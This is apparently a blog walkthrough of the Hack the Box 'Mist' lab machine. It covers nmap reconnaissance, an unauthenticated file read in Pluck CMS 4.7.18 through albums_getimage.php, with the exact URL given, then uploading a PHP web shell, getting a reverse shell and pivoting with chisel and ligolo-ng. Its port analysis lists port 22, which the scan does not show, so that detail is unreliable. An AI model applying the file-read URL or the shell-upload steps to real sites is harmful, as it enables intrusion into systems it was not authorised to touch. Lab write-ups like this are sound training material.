Introduction to Mist:
This write-up will explore the “Mist” machine from Hack the Box, categorized as an insanely difficult challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.
Objective:
The goal of this walkthrough is to complete the “Mist” machine from Hack the Box by achieving the following objectives:
User Flag:
Root Flag:
Enumerating the Mist Machine
Reconnaissance:
Nmap Scan:
Begin with a network scan to identify open ports and running services on the target machine.
nmap -sC -sV -oN nmap_initial.txt 10.10.11.17
Nmap Output:
┌─[darknite@parrot]─[~/Documents/htb/mist]
└──╼ $nmap -sV -sC 10.10.11.17 -oA initial
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-24 19:49 EDT
Nmap scan report for 10.10.11.17
Host is up (0.18s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
|_http-generator: pluck 4.7.18
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
| http-title: Mist - Mist
|_Requested resource was http://10.10.11.17/?file=mist
| http-robots.txt: 2 disallowed entries
|_/data/ /docs/
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.23 seconds
Analysis:
- Port 22 (SSH): Provides secure remote access.
- Port 80 (HTTP): Hosts an Apache server with PHP, running
pluck
4.7.18.- PHPSESSID cookies lack httponly flag, potentially insecure.
- Restricted paths:
/data/
and/docs/
(listed inrobots.txt
).
Web Enumeration:
Perform web enumeration to discover potentially exploitable directories and files.
Exploitation
Web Application Exploration:
Clicking “admin” redirects to a login page.
Pluck v4.7.18 has a vulnerability allowing file inclusion without authentication, potentially leading to Remote Code Execution (RCE). Exploiting this issue requires administrator credentials. For more details, see the GitHub issue on Pluck CMS.
The file “albums_getimage.php” has been identified as using the parameter “?image=” without verifying that the passed file is indeed an image. This oversight allows a remote, unauthenticated attacker to read the contents of arbitrary files, including server-level PHP files.
The article suggests that accessing the URL http://10.10.11.17/data/modules/albums/albums_getimage.php?image=admin_backup.php
allows reading the “admin_backup” PHP page. Here, /data/modules/albums/albums_getimage.php?image=admin_backup.php
is equivalent to /data/settings/modules/albums/admin_backup.php
.
Go to the login page http://mist.htb/login.php
Following the steps in the video, start by uploading a PHP shell to the target module. Initially, attempt to upload a basic shell that runs directly. However, upon switching to a Base64-encoded reverse shell, issues may arise. In this case, try using p0wny-shell
, as it offers the advantage of not triggering PowerShell visibility if it encounters errors.
To begin, create a zip package containing the shell for upload.
Let’s initiate our listener.
The Powny shell interface will resemble something like the image above.
Let’s run the shell shown above.
Boom! We’ve successfully established a connection back to us.
Modify one .lnk file in the C:\Common Applications directory.
We need to execute the command mentioned above.
It will appear similar to what’s shown above.
Enumerate as Bradon.Keywarp access
We have established a connection as the bradon.keywarp user.
As shown, Brandon.Keywarp is a domain user on DC01, which has the IP address 192.168.100.100. Based on the net user /domain
result, our next move could involve compromising another domain user account with higher privileges than Brandon’s. To proceed, we need to interact with DC01, which is why we’re doing port forwarding here.
We need to run the chisel command.
Unfortunately, it’s still a different IP address.
After some time, we realized that it doesn’t work.
After switching to the ligolo-ng proxy, it worked like a charm.
We can read the user flag by typing “type user.txt” command
Escalate to Root Privileges Access on Mist machine
Privilege Escalation:
We have successfully obtain the access to administrator at the moment
We can read the root flag by typing “type root.txt” command
No responses yet